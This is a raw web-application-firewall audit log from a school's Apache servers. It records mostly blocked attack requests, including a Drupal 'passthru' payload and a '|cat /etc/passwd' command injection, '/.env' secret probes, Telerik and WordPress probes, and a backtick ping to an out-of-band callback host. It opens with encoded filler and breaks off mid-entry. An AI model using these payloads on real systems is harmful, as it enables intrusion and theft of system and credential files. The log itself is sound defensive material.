BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ
UFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%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%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%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e --982b9140-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --982b9140-E-- --982b9140-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)((?:\\bx(?:link:href|html|mlns)|!ENTITY\\b.{0,399}?\\b(?:SYSTEM|PUBLIC)|\\bdata:text\\/html))" at ARGS:stagingTaskData. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "170"] [id "213060"] [rev "7"] [msg "COMODO WAF: XSS Filter - Category 3: Attribute Vector||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801160283733 8534 (- - -) Stopwatch2: 1747801160283733 8534; combined=7449, p1=230, p2=7202, p3=0, p4=0, p5=17, sr=40, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982b9140-Z-- --a6882021-A-- [21/May/2025:11:19:20 +0700] aC1USIv3pT1iV0OxjLTn1wAAAJA 103.236.140.4 41466 103.236.140.4 8181 --a6882021-B-- POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.0 Referer: perpustakaan.smkn22jakarta.sch.id/user/register Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 631 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Accept: application/json Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 X-Requested-With: XMLHttpRequest X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 161474784 --a6882021-C-- -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#post_render][]" passthru -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#type]" markup -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="mail[#markup]" cat /etc/passwd -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="form_id" user_register_form -----------------------------99533888113153068481322586663 Content-Disposition: form-data; name="_drupal_ajax" --a6882021-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --a6882021-E-- --a6882021-H-- Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. 
Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart parsing error: Multipart: Final boundary missing."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747801160299045 4707 (- - -) Stopwatch2: 1747801160299045 4707; combined=3360, p1=393, p2=2885, p3=27, p4=28, p5=27, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a6882021-Z-- --449ecd5e-A-- [21/May/2025:11:19:20 +0700] aC1USIv3pT1iV0OxjLTn2AAAAJE 103.236.140.4 41468 103.236.140.4 8181 --449ecd5e-B-- POST /xmlpserver/ReportTemplateService.xls HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 95 User-Agent: Mozilla/5.0 (Fedora; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: text/xml; charset=UTF-8 X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 160557812 --449ecd5e-C-- --449ecd5e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --449ecd5e-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747801160299152 4860 (- - -) Stopwatch2: 1747801160299152 4860; combined=3322, p1=371, p2=2875, p3=24, p4=23, p5=29, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --449ecd5e-Z-- --01cc9a5b-A-- [21/May/2025:11:19:20 +0700] aC1USIv3pT1iV0OxjLTn2QAAAJU 103.236.140.4 41472 103.236.140.4 8181 --01cc9a5b-B-- POST /password_change.cgi HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 73 User-Agent: Mozilla/5.0 (CentOS; Linux i686; rv:130.0) Gecko/20100101 Firefox/130.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 161474787 --01cc9a5b-C-- user=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2 --01cc9a5b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --01cc9a5b-E-- --01cc9a5b-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /password_change.cgi"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801160305043 1691 (- - -) Stopwatch2: 1747801160305043 1691; combined=576, p1=375, p2=173, p3=0, p4=0, p5=27, sr=78, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01cc9a5b-Z-- --0f948d29-A-- [21/May/2025:11:19:20 +0700] aC1USCioYDAgD0WHUjSnbQAAAE8 103.236.140.4 41488 103.236.140.4 8181 --0f948d29-B-- POST /soap.cgi?service=whatever-control;curl HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 16 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Type: text/xml SOAPAction: "whatever-serviceType#whatever-action" X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164788462 --0f948d29-C-- whatever-content --0f948d29-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f948d29-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. 
This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747801160320372 5390 (- - -) Stopwatch2: 1747801160320372 5390; combined=3981, p1=362, p2=3534, p3=21, p4=25, p5=39, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f948d29-Z-- --e6eef26d-A-- [21/May/2025:11:19:21 +0700] aC1USYv3pT1iV0OxjLTn2wAAAJI 103.236.140.4 41496 103.236.140.4 8181 --e6eef26d-B-- GET /Telerik.Web.UI.WebResource.axd?type=rau HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 Accept: */* Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 164788465 --e6eef26d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e6eef26d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801161142375 2256 (- - -) Stopwatch2: 1747801161142375 2256; combined=898, p1=387, p2=477, p3=0, p4=0, p5=34, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e6eef26d-Z-- --32bd0878-A-- [21/May/2025:11:19:22 +0700] aC1USov3pT1iV0OxjLTn3QAAAIM 103.236.140.4 41502 103.236.140.4 8181 --32bd0878-B-- GET /Telerik.Web.UI.WebResource.axd?_TSM_CombinedScripts_=;;System.Web.Extensions,%20Version=4.0.0.0,%20Culture=neutral,%20PublicKeyToken=31bf3856ad364e35:de-DE:db3d9eb3-6d72-4959-b303-32b61119a4a8:ea597d4b:b25378d2 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 164788468 --32bd0878-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --32bd0878-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".web.ui.webresource.axd"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801162098505 2559 (- - -) Stopwatch2: 1747801162098505 2559; combined=1347, p1=342, p2=977, p3=0, p4=0, p5=27, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --32bd0878-Z-- --97f2a875-A-- [21/May/2025:11:29:01 +0700] aC1WjYv3pT1iV0OxjLTn7QAAAJc 103.236.140.4 41568 103.236.140.4 8181 --97f2a875-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.46.219.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.46.219.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --97f2a875-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97f2a875-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747801741983740 2659 (- - -) Stopwatch2: 1747801741983740 2659; combined=1331, p1=444, p2=856, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97f2a875-Z-- --4dfd8b09-A-- [21/May/2025:11:40:16 +0700] aC1ZMIv3pT1iV0OxjLTn8wAAAI0 103.236.140.4 41618 103.236.140.4 8181 --4dfd8b09-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --4dfd8b09-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4dfd8b09-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747802416547801 865 (- - -) Stopwatch2: 1747802416547801 865; combined=339, p1=291, p2=0, p3=0, p4=0, p5=47, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4dfd8b09-Z-- --e7d0ea37-A-- [21/May/2025:11:54:12 +0700] aC1cdHZGSt58M5vv3glyygAAAA0 103.236.140.4 41712 103.236.140.4 8181 --e7d0ea37-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.81.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.81.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Accept-Charset: utf-8 --e7d0ea37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7d0ea37-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747803252621177 785 (- - -) Stopwatch2: 1747803252621177 785; combined=331, p1=296, p2=0, p3=0, p4=0, p5=35, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7d0ea37-Z-- --574a4a3c-A-- [21/May/2025:11:54:18 +0700] aC1cenZGSt58M5vv3glyywAAAA4 103.236.140.4 41714 103.236.140.4 8181 --574a4a3c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.186 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.186 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --574a4a3c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --574a4a3c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747803258792522 2774 (- - -) Stopwatch2: 1747803258792522 2774; combined=1253, p1=379, p2=845, p3=0, p4=0, p5=29, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --574a4a3c-Z-- --de5fe03e-A-- [21/May/2025:12:03:53 +0700] aC1euYv3pT1iV0OxjLToDAAAAIQ 103.236.140.4 41742 103.236.140.4 8181 --de5fe03e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 192.169.148.159 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 192.169.148.159 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --de5fe03e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de5fe03e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747803833299035 3061 (- - -) Stopwatch2: 1747803833299035 3061; combined=1396, p1=461, p2=903, p3=0, p4=0, p5=32, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de5fe03e-Z-- --83083005-A-- [21/May/2025:12:10:53 +0700] aC1gXYv3pT1iV0OxjLToFgAAAIA 103.236.140.4 41786 103.236.140.4 8181 --83083005-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 131.196.4.228 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 131.196.4.228 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --83083005-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83083005-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747804253959791 2911 (- - -) Stopwatch2: 1747804253959791 2911; combined=1263, p1=462, p2=770, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83083005-Z-- --0d79de1e-A-- [21/May/2025:12:13:26 +0700] aC1g9ov3pT1iV0OxjLToHAAAAIw 103.236.140.4 41810 103.236.140.4 8181 --0d79de1e-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.251 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.251 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --0d79de1e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d79de1e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747804406961708 724 (- - -) Stopwatch2: 1747804406961708 724; combined=313, p1=275, p2=0, p3=0, p4=0, p5=38, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d79de1e-Z-- --cf2f1f01-A-- [21/May/2025:12:13:31 +0700] aC1g-xpv_mIXt2pDBOoHUAAAAMs 103.236.140.4 41812 103.236.140.4 8181 --cf2f1f01-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.88.97.14 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.88.97.14 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --cf2f1f01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cf2f1f01-H-- Message: Access denied with code 403 (phase 1). 
Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747804411835636 832 (- - -) Stopwatch2: 1747804411835636 832; combined=337, p1=295, p2=0, p3=0, p4=0, p5=42, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cf2f1f01-Z-- --b8d5fb29-A-- [21/May/2025:12:32:49 +0700] aC1lgYv3pT1iV0OxjLToKwAAAJY 103.236.140.4 41892 103.236.140.4 8181 --b8d5fb29-B-- GET /card_scan.php?No=30&ReaderNo=%60ping%20d0mbkqa4kqtm561jt3n04zxwz7opnb1g5.oast.fun%60 HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id 